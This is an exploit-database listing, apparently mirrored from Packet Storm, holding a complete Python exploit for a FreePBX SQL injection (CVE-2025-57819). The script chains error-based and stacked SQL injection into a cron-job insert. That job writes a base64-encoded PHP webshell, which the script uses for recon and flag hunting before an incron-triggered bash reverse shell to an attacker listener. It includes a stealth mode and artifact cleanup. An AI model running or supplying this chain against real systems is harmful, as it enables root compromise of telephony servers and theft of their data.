Share
## https://sploitus.com/exploit?id=PACKETSTORM:223388
==================================================================================================================================
| # Title : FreePBX 17.0.3 SQLi to Root Shell |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://www.freepbx.org/ |
==================================================================================================================================
[+] Summary : This Python3 script exploits a critical SQL injection vulnerability (CVE-2025-57819) in FreePBX.
This issue has been patched in endpoint versions 15.0.66, 16.0.89, and 17.0.3.
[+] POC :
#!/usr/bin/env python3
import requests
import urllib3
import sys
import time
import base64
import json
import zlib
import threading
import socket
import re
from urllib.parse import quote, urlparse
from colorama import init, Fore, Style
import argparse
import random
import string
init(autoreset=True)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class FreePBXExploit:
def __init__(self, target, lhost=None, lport=None, verbose=False, stealth=False):
self.target = target.rstrip('/')
self.lhost = lhost
self.lport = lport
self.verbose = verbose
self.stealth = stealth
self.session = requests.Session()
self.webshell_path = None
self.session.headers.update({
'User-Agent': self.get_random_ua() if stealth else 'Mozilla/5.0 (X11; Linux x86_64)'
})
def get_random_ua(self):
uas = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36'
]
return random.choice(uas)
def log_info(self, msg): print(f"{Fore.CYAN}[*]{Style.RESET_ALL} {msg}")
def log_success(self, msg): print(f"{Fore.GREEN}[+]{Style.RESET_ALL} {msg}")
def log_warning(self, msg): print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} {msg}")
def log_error(self, msg): print(f"{Fore.RED}[-]{Style.RESET_ALL} {msg}")
def log_debug(self, msg):
if self.verbose:
print(f"{Fore.MAGENTA}[D]{Style.RESET_ALL} {msg}")
def build_sqli_url(self, payload):
"""Build URL with SQL injection payload"""
ajax_path = f"{self.target}/admin/ajax.php"
module = "FreePBX\\modules\\endpoint\\ajax"
params = {
'module': module,
'command': 'model',
'template': 'x',
'model': 'model',
'brand': payload
}
param_str = '&'.join([f"{k}={quote(str(v))}" for k, v in params.items()])
return f"{ajax_path}?{param_str}"
def sqli_read(self, subquery, retries=3):
"""Extract data via error-based SQL injection"""
payload = f"x' AND EXTRACTVALUE(1,CONCAT(0x7e,({subquery}),0x7e))-- -"
for attempt in range(retries):
try:
url = self.build_sqli_url(payload)
response = self.session.get(url, verify=False, timeout=10)
if response.status_code == 200:
try:
data = response.json()
error_msg = data.get('error', {}).get('message', '')
match = re.search(r'~([^~]+)~', error_msg)
if match:
return match.group(1)
except:
pass
except Exception as e:
self.log_debug(f"SQLi read attempt {attempt + 1} failed: {e}")
time.sleep(1)
return None
def sqli_write(self, statement):
"""Execute SQL write operation"""
payload = f"x'; {statement}-- -"
try:
url = self.build_sqli_url(payload)
response = self.session.get(url, verify=False, timeout=10)
if response.status_code == 200:
if 'Whoops' in response.text or 'array offset' in response.text:
return True
except Exception as e:
self.log_debug(f"SQLi write error: {e}")
return True
return False
def webshell_exec(self, cmd):
"""Execute command via webshell"""
if not self.webshell_path:
return None
try:
url = f"https://{self.target}{self.webshell_path}"
response = self.session.get(url, params={'cmd': cmd}, verify=False, timeout=15)
if response.status_code == 200:
return response.text.strip()
except:
pass
return None
def enumerate_database(self):
"""Enumerate database information"""
self.log_info("Enumerating database...")
db_info = {}
queries = {
'database': 'SELECT DATABASE()',
'user': 'SELECT USER()',
'version': 'SELECT VERSION()',
'hostname': 'SELECT @@hostname'
}
for key, query in queries.items():
result = self.sqli_read(query)
if result:
db_info[key] = result
self.log_success(f"{key.capitalize()}: {result}")
else:
self.log_warning(f"Could not retrieve {key}")
return db_info
def drop_webshell(self):
"""Drop PHP webshell via cron job"""
self.log_info("Dropping webshell via cron job...")
random_name = ''.join(random.choices(string.ascii_lowercase, k=8))
self.webshell_path = f"/{random_name}.php"
webshell_code = "PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+Cg=="
full_path = f"/var/www/html{self.webshell_path}"
cmd = f"echo {webshell_code} | base64 -d > {full_path}"
cron_name = f"sys_{random_name}" if self.stealth else "poc_webshell"
sql = f"""
INSERT INTO cron_jobs
(modulename, jobname, command, class, schedule, max_runtime, enabled, execution_order)
VALUES ('sysadmin', '{cron_name}', '{cmd}', NULL, '* * * * *', 30, 1, 1)
"""
if self.sqli_write(sql):
self.log_success(f"Cron job inserted (executes every minute)")
return True
else:
self.log_error("Failed to insert cron job")
return False
def wait_for_webshell(self, timeout=120):
"""Wait for webshell to become active"""
self.log_info(f"Waiting for webshell activation (max {timeout}s)...")
start_time = time.time()
while time.time() - start_time < timeout:
result = self.webshell_exec("id")
if result and ('uid=' in result or 'gid=' in result):
self.log_success(f"Webshell active! Response: {result[:100]}")
return True
elapsed = int(time.time() - start_time)
remaining = timeout - elapsed
self.log_info(f"Webshell not ready... ({remaining}s remaining)")
time.sleep(10)
self.log_error("Timeout waiting for webshell")
return False
def execute_system_commands(self, commands):
"""Execute multiple system commands and collect output"""
results = {}
for cmd in commands:
self.log_info(f"Executing: {cmd}")
output = self.webshell_exec(cmd)
if output:
results[cmd] = output
print(f" {output[:200]}")
else:
print(" (no output)")
return results
def get_flags(self):
"""Attempt to read CTF flags"""
self.log_info("Searching for flags...")
flag_patterns = [
'/home/*/user.txt',
'/home/*/flag.txt',
'/root/root.txt',
'/root/flag.txt',
'/var/www/html/flag.txt'
]
flags_found = []
for pattern in flag_patterns:
cmd = f"find {pattern} -type f 2>/dev/null | head -1"
path = self.webshell_exec(cmd)
if path and path.strip():
flag = self.webshell_exec(f"cat {path.strip()}")
if flag and len(flag) < 200:
self.log_success(f"Flag found at {path}: {flag}")
flags_found.append((path, flag))
return flags_found
def incron_root_shell(self):
"""Use incron hook for root reverse shell"""
if not self.lhost or not self.lport:
self.log_warning("No listener configured, skipping root shell")
return False
self.log_info("Preparing incron-based root shell...")
rev_shell = f"bash -i >& /dev/tcp/{self.lhost}/{self.lport} 0>&1"
payload_data = [rev_shell, "txn"]
json_str = json.dumps(payload_data)
compressed = zlib.compress(json_str.encode())
encoded = base64.b64encode(compressed).decode().replace('/', '_')
trigger_file = f"/var/spool/asterisk/incron/api.fwconsole-commands.{encoded}"
self.log_info(f"Trigger file: {trigger_file}")
self.log_warning(f"Start listener: nc -lvnp {self.lport}")
input(f"{Fore.YELLOW}[?]{Style.RESET_ALL} Press Enter when listener is ready...")
result = self.webshell_exec(f"touch '{trigger_file}'")
if result is None or result == "":
self.log_success("Trigger file created - incron should fire as root!")
self.log_info("Check your listener for root shell...")
time.sleep(5)
return True
else:
self.log_error(f"Failed to create trigger file: {result}")
return False
def cleanup(self):
"""Remove webshell and cron job"""
self.log_info("Cleaning up...")
if self.webshell_path:
full_path = f"/var/www/html{self.webshell_path}"
self.webshell_exec(f"rm -f {full_path}")
self.log_success("Webshell removed")
sql = "DELETE FROM cron_jobs WHERE jobname LIKE 'poc_%' OR jobname LIKE 'sys_%'"
self.sqli_write(sql)
self.log_success("Cron jobs cleaned")
def run_exploit(self):
"""Main exploit chain"""
print(f"""
{Fore.MAGENTA}โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ FreePBX CVE-2025-57819 - Advanced Exploit โ
โ Full Chain: SQLi โ Webshell โ Root Shell โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ{Style.RESET_ALL}
""")
self.log_info(f"Target: https://{self.target}")
if self.lhost:
self.log_info(f"Listener: {self.lhost}:{self.lport}")
self.log_info("Step 1: Verifying SQL injection...")
test_result = self.sqli_read("SELECT 123")
if test_result != "123":
self.log_error("SQL injection not working!")
return False
self.log_success("SQL injection confirmed!")
self.enumerate_database()
self.log_info("Step 2: Dropping webshell...")
if not self.drop_webshell():
return False
if not self.wait_for_webshell():
return False
self.log_info("Step 3: System reconnaissance...")
recon_cmds = [
"id",
"hostname",
"uname -a",
"whoami",
"pwd"
]
self.execute_system_commands(recon_cmds)
self.get_flags()
if self.lhost and self.lport:
self.log_info("Step 4: Attempting root shell...")
self.incron_root_shell()
cleanup = input(f"\n{Fore.YELLOW}[?]{Style.RESET_ALL} Cleanup artifacts? [y/N] ")
if cleanup.lower() == 'y':
self.cleanup()
self.log_success("Exploit completed!")
return True
def main():
parser = argparse.ArgumentParser(description='FreePBX CVE-2025-57819 Exploit')
parser.add_argument('-t', '--target', required=True, help='Target FreePBX URL (e.g., connected.htb)')
parser.add_argument('-l', '--lhost', help='Listener IP for reverse shell')
parser.add_argument('-p', '--lport', type=int, help='Listener port')
parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')
parser.add_argument('-s', '--stealth', action='store_true', help='Enable stealth mode')
parser.add_argument('--check', action='store_true', help='Only check vulnerability')
args = parser.parse_args()
exploit = FreePBXExploit(
target=args.target,
lhost=args.lhost,
lport=args.lport,
verbose=args.verbose,
stealth=args.stealth
)
if args.check:
print("Checking vulnerability...")
result = exploit.sqli_read("SELECT 123")
if result == "123":
print(f"{Fore.GREEN}[+] Target is VULNERABLE{Style.RESET_ALL}")
else:
print(f"{Fore.RED}[-] Target is NOT vulnerable{Style.RESET_ALL}")
return
exploit.run_exploit()
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================